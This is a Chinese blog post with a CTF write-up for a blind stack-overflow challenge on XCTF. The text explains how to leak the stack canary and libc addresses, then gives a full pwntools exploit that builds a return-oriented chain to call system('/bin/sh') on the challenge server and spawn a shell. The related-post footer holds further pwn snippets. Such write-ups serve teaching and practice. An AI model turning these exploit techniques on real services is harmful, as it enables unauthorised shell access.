攻防世界PWN之stackoverflow(栈溢出盲打)题解

最新推荐文章于 2022-04-14 15:33:33 发布
最新推荐文章于 2022-04-14 15:33:33 发布
阅读量1.8k 收藏 3
点赞数 1
分类专栏: pwn CTF 二进制漏洞 文章标签: PWN CTF 二进制漏洞 缓冲区溢出 PWN盲打
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/104098231
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

Stackoverflow

这题,没有提供给我们二进制文件,仅仅有一个可交互的地址。由题意也可以知道,它存在栈溢出。这是一个栈溢出盲打的题目。

首先,就是确定栈溢出的长度

我们发现,当我们输入23个整数后,就发生了溢出报错,同时,我们也知道了,这个程序开启了canary机制,这正好被我们利用起来判断栈溢出的长度。

接下来,就是泄露栈数据了,主要依靠功能3,它会把数组里的数据相邻的去重后输出

但这似乎不容易发现什么,我们不如转换成十六进制,来观察

  1. def getStackData():  
  2.    data = []  
  3.    changeNum(50)  
  4.    unique()  
  5.    data_s = (sh.recvuntil('\n',drop = True).strip(' ')).split(' ')  
  6.    for s in data_s:  
  7.       x = int(s,10)  
  8.       if x < 0:  
  9.          x = 0x100000000 + x  
  10.       data.append(x)  
  11.    return data  

我们需要确定程序位数,一开始,我以为程序是32位的,以为这里面数据都是4字节,后来分析,发现32位的话,分析不出什么信息,我们看到栈里面有一个数据是一直没变,并且有些数据末尾3个十六进制数据也没变

0x401020应该是程序里的某个地方,而0x______830应该是libc中的某个地方,并且64位程序如果没开启PIE,程序的加载基址就是从0x400000开始,由此,我们可以判断这是一个64位的程序,那么就能解释的通顺了,0x401020是main函数的ebp处,前面两个4字节数据构成了8字节的canary,而0x7f6c和0xbdfbb830构成了libc_start_main里的某处地址,看末尾的830数据,根据经验,以及日常刷题的熟练,感觉很眼熟,这好像是libc2.23版本里面的,于是,我们在glibc2.23环境下,随便运行一个二进制文件,观察栈布局

那么,我们可以确定,程序的glibc就是2.23版本,那么我们就能计算出glibc基地址,进而计算出需要的函数即字符串的地址。那么接下来的操作就是一个简单的栈溢出操作,只不过,我们在写数据的时候,需要把8字节数据拆分后再写。为了调用system(“/bin/sh”),在64位程序下,我们还需要pop rdi;ret这个gadget,我们可以在libc2.23中查找。

综上,我们的exp脚本如下

  1. #coding:utf8  
  2. from pwn import *  
  3. import numpy as np  
  4.   
  5. sh = remote('111.198.29.45',46999)  
  6. libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')  
  7. system_s = libc.sym['system']  
  8. binsh_s = libc.search('/bin/sh').next()  
  9. pop_rdi = 0x21102  
  10.   
  11. def unique():  
  12.    sh.sendlineafter('>','3')  
  13.   
  14. def changeNum(num):  
  15.    sh.sendlineafter('>','1')  
  16.    sh.sendline(str(num))  
  17.   
  18. def setArray(arr):  
  19.    sh.sendlineafter('>','2')  
  20.    sh.recvuntil('num:')  
  21.    for x in arr:  
  22.       sh.sendline(str(x))  
  23.   
  24. def getStackData():  
  25.    data = []  
  26.    changeNum(50)  
  27.    unique()  
  28.    data_s = (sh.recvuntil('\n',drop = True).strip(' ')).split(' ')  
  29.    for s in data_s:  
  30.       x = int(s,10)  
  31.       if x < 0:  
  32.          x = 0x100000000 + x  
  33.       #print hex(x)  
  34.       data.append(x)  
  35.    return data  
  36.   
  37. #8字节数据拆分为24字节  
  38. def split_data(data):  
  39.    data0 = data & 0xFFFFFFFF  
  40.    if data0 & 0x80000000 != 0:  
  41.       data0 = -0x100000000 + data0  
  42.   
  43.    data1 = (data & 0xFFFFFFFF00000000) >> 32  
  44.    if data1 & 0x80000000 != 0:  
  45.       data1 = -0x100000000 + data1  
  46.    return [data0,data1]  
  47.   
  48. #经过测试,缓冲区大小为22int,下一个区域就是canary  
  49. sh.sendlineafter('input n:','22')  
  50. #初始化输入全0  
  51. setArray(np.zeros(22,dtype=int))  
  52.   
  53. data = getStackData()  
  54. #程序是64位的,数据被截成两部分了  
  55. canary0 = data[1]  
  56. canary1 = data[2]  
  57.   
  58. #判断四字节数据是否为负数,是则需要转换回去  
  59. if canary0 & 0x80000000 != 0:  
  60.    canary0 = -0x100000000 + canary0  
  61.   
  62. if canary1 & 0x80000000 != 0:  
  63.    canary1 = -0x100000000 + canary1  
  64.   
  65.   
  66. __libc_start_main_F0 = (data[6] << 32) + data[5]  
  67. __libc_start_main_addr = __libc_start_main_F0 - 0xF0  
  68. libc_base = __libc_start_main_addr - libc.sym['__libc_start_main']  
  69. system_addr = libc_base + system_s  
  70. binsh_addr = libc_base + binsh_s  
  71. pop_rdi_addr = libc_base + pop_rdi  
  72.   
  73. print 'libc base=',hex(libc_base)  
  74.   
  75. #拆分8字节数据为4字节  
  76. pop_rdi_addr = split_data(pop_rdi_addr)  
  77. binsh_addr = split_data(binsh_addr)  
  78. system_addr = split_data(system_addr)  
  79.   
  80.   
  81. changeNum(32)  
  82. arr = list(np.zeros(22,dtype=int))  
  83. arr.append(canary0)  
  84. arr.append(canary1)  
  85. arr.append(0)  
  86. arr.append(0)  
  87. arr.append(pop_rdi_addr[0])  
  88. arr.append(pop_rdi_addr[1])  
  89. arr.append(binsh_addr[0])  
  90. arr.append(binsh_addr[1])  
  91. arr.append(system_addr[0])  
  92. arr.append(system_addr[1])  
  93.   
  94. setArray(arr)  
  95. #getshell  
  96. sh.sendlineafter('>','4')  
  97.   
  98. sh.interactive()  

总结:对于盲打类型的题目,要熟悉栈的布局,熟悉一些常用的libc版本的地址,感兴趣的可以做一个libc_start_main+XX的数据库,用来查询libc版本,方便以后使用。

ha1vk
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN入门之栈迁移-附件资源
03-02
PWN入门之栈迁移-附件资源
攻防世界 pwnstack writeup
m0_73605862的博客
05-30 776
Step5:shift+F12查看字符串发现/bin/sh,进入发现后门函数,查看地址(ctr+x)发现为:0x400762。Step6:编写exp,输入后,ls查看文件,然后发现有一个叫flag的文件,cat查看文件,得到flag。【来源】(攻防世界)https://adworld.xctf.org.cn/challenges/list。Step4:进入vuln()函数查看一下,发现有一个buf,查看发现从0xA0到0x08。Step3:发现main函数,f5查看伪代码(如果键被占用,fn+f5)。
Pwn中阶学习1-[栈溢出]/篇3
m0_52343643的博客
04-14 1156
这种题型一般是在题目没有给出程序文件的时候,我们对程序一无所知,对程序是否栈溢出栈溢出长度、gadget地址,源函数地址等只能进行爆破得到 攻击条件: 程序存在栈溢出漏洞 服务器端的进程在崩溃后会重新启动,且启动进程地址与先前一样。目前 nginx, MySQL, Apache, OpenSSH 等服务器应用都是符合这种特性的。 BROP绕过ASLR、NX、Canary保护 步骤 爆破栈溢出长度 得到漏洞函数或main函数地址(stop gadget:使程序返回地
pwn学习总结(三) —— 栈溢出经典题型整理
qq_41988448的博客
11-19 2491
pwn学习总结(五) —— 经典题目整理一1. 栈溢出入门2. 字符串截取+缓冲区执行3. GOT泄露4. libc泄露5. 使用DynELF实现远程libc泄露 1. 栈溢出入门 平台:jarvisoj 题目:level0 靶机:nc pwn2.jarvisoj.com 9881 查看程序防护: 查看反汇编: exp: from pwn import * import pwn r = ...
格式化字符串类盲pwn的dump方法
weixin_46483787的博客
04-11 579
有一类题目,不会给任何文件,只给一个ip和端口,这种称为blind pwn(盲pwn),如果这类pwn存在格式化字符串漏洞的话,可以通过一些手法拿到整个二进制程序,这对我们的逆向分析和解题是十分重要的,举个例子: 在2022年的Insomni’hack teaser比赛上,有一道题CovidLe$s,就是一道盲pwn,输入什么就回显什么,但是存在格式化字符串漏洞,并且应该是栈上的,通过不断的尝试是可以大致猜测出栈结构的: 从偏移12开始是栈上的缓冲区,29那里是canary,31是返回地址,根据后三位可以
CTF Blind pwn题型学习笔记
lifanxin的博客
08-31 1822
Blind pwn概述如何辨别漏洞类型逻辑漏洞盲打格式化字符串盲打原理阐述例题讲解axb_2019_fmt32栈溢出盲打盲打总结 概述   所谓Blind pwn,即是在无法获得二进制程序文件的情况下对题目进行漏洞利用。这篇博客主要是将见到过的盲打pwn题做一个总结,大概可以分为以下几类盲打pwn题:逻辑漏洞盲打、格式化字符串盲打栈溢出盲打、堆盲打。 如何辨别漏洞类型   对于盲打题,首先第一步应该是判断属于哪种类型的盲打,判断的步骤也很简单,nc连上后,直接看程序提供的菜单功能。   一般来说,需要逻
XCTF warmup
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-10 1107
这题没有二进制文件 最简单的一个盲打pwn题 。虽然难的题目我还不会 只有一个ip和一个端口 nc连接上去看看 发现程序会给我们返回一个地址 猜测这个地址就是后门函数的地址 写了个爆破程序 from pwn import * def blast(ip,port,padd_start,padd_end,addr): for i in range(padd_start,padd_end): ...
CTF(pwn)攻防世界warmup
半岛铁盒的博客
03-06 839
题目描述 这种题很有意思,只给了题目场景地址没有文件,让你盲打,类似于web中的盲注吧; nc连接,给了 目标地址, 思路是:利用栈溢出覆盖,返回这个地址; 具体是溢出多少是不确定的,是P64(),还是 P32() 也是不确定的; 写个EXP逐渐试一下 from pwn import * a = 0x40060d for i in range(10,100): p = remote('111.200.241.244',49684) payload='a'*i+p64(a) p.recvun
Pwn】2019安洵杯线上赛 fmt32 && fmt64
Nothing
12-01 1009
出题人好像比较喜欢blind pwn,5道pwn题里有3个,由于时间关系来不及看rop64了(我太菜)。 1.fmt32 只给了ip&port,没有附件猜测是blind pwn,根据题目名字,猜想有格式化字符串漏洞,试了一下发现是一个循环(毕竟是复读机),每次都可以利用格式化字符串漏洞,于是首先想法是先将内存dump下来再分析,如果32位程序没开pie保护,程序首地址为0x8048000。...
攻防世界pwn when_did_you_born(栈溢出
Haowill的博客
04-09 487
攻防世界pwn when_did_you_born(栈溢出) 这是我第一次写博客,希望帮助到大家,感谢大家的支持。 pwn题做题步骤 相信做这道题的同学们都是新手,或者是老手回来刷题。所以我这里会简单介绍我做pwn题的方法。 一、下载程序到电脑 这个就是下载到电脑里的样子。 二、判断程序类型 这个程序没有.exe后缀,所以它不是window的,它是linux的。在我们学习pwn的初期都是linux...
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc
攻防世界pwn题:forgot.doc
07-13
攻防世界pwn题:forgot.doc
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
PWN简单利用堆栈溢出漏洞
weixin_43891422的博客
07-16 1139
PWN简单利用堆栈溢出漏洞PWN简单利用堆栈溢出漏洞0x01 栈的介绍栈是什么栈的特点栈中如何存储数据0x02 函数调用栈寄存器分配0x03 栈帧结构例题:堆栈溢出漏洞利用0x01.运行程序、查看文件类型 和 保护措施0x02.反汇编分析0x03.调试分析payload0x04.payload生成脚本0x05.总结 PWN简单利用堆栈溢出漏洞 0x01 栈的介绍 栈是什么 栈都是一种数据项按序排列的数据结构。 栈的特点 先入先出,先后放入栈中的数据要先取出来。 栈的地址从高处向低处增长,且栈是一块连续区
Pwn基础学习1-[栈溢出]/篇1
m0_52343643的博客
03-14 6818
缓冲区溢出的一种,当缓冲区数据大于缓冲区大小时,缓冲区之外的有用数据就会被多出去的缓冲区数据覆盖改写,从而可能导致程序崩溃。
从零开始的数据结构与算法
weixin_47012384的博客
10-26 196
1.模板函数 //增强代码的复用性,更改T即可以更改数据结构 // T 可以改为其他名字,如 Item // template <typename T1, T2...> template <typename T> void swap(T &a, T &b) { T temp; temp = a; a = b; b = temp; } 2.new int( )和new int[ ]的区别 new int[ ] 是创建一个int型数组,数组大小是在[ ]中指定,
CG-CTF Stack Overflow
weixin_43464124的博客
05-11 797
为了上800分也是够了… 题目地址:pwn 看了几篇wp,觉得写得总是差那么一丢丢意思 首先检查溢出点 通过双击A可以看到,A这个数组的大小为40 但其可以接受64个字符的大小 所以这是第一个溢出点 然后往下看 虽然明面上显示的是输入s是有限制的 限制为n 但是当我们双击n的时候会发现 n就在A的下面 因此我们可以通过A来溢出到n 在函数列表中我们可以看到有一个函数 名字叫做pwnme 这部明...
18.9.16 PWN2----Stack Overflow
qq_42192672的博客
09-16 281
还是cgctf题目 拖进IDA 来说一说fgets(..)函数 原型  char *  fgets(char * s, int n,FILE *stream); 参数: s: 字符型指针,指向存储读入数据的缓冲区的地址; n: 从流中读入n-1个字符; stream : 指向读取的流。 我们可以看到main中有两个函数,menu和message,(函数列表中还有pwnme函数,...
攻防世界pwn新手题答案
最新发布
08-10
回答: 对于攻防世界pwn新手题,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考CTF-wiki上对格式化字符串的总结。另外,还可以利用栈溢出漏洞来实现攻击。栈溢出漏洞的原理是当输入的数据超过了栈的缓冲区大小时,会覆盖到相邻的内存区域,包括函数返回地址等重要信息。通过溢出覆盖system函数的参数为"/bin/sh",就可以获取到shell权限。在IDA32中,可以通过查看字符串窗口,找到可以直接利用的字符串,比如system和/bin/sh。这样就可以猜测需要溢出覆盖system函数的参数,实现获取shell的目的。123 #### 引用[.reference_title] - *1* *2* [xctf攻防世界pwn基础题解(新手食用)](https://blog.csdn.net/lplp9822/article/details/89735167)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *3* [攻防世界 pwn 二进制漏洞简单题练习区 答题(1-10题解)](https://blog.csdn.net/qq_33957603/article/details/122450397)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值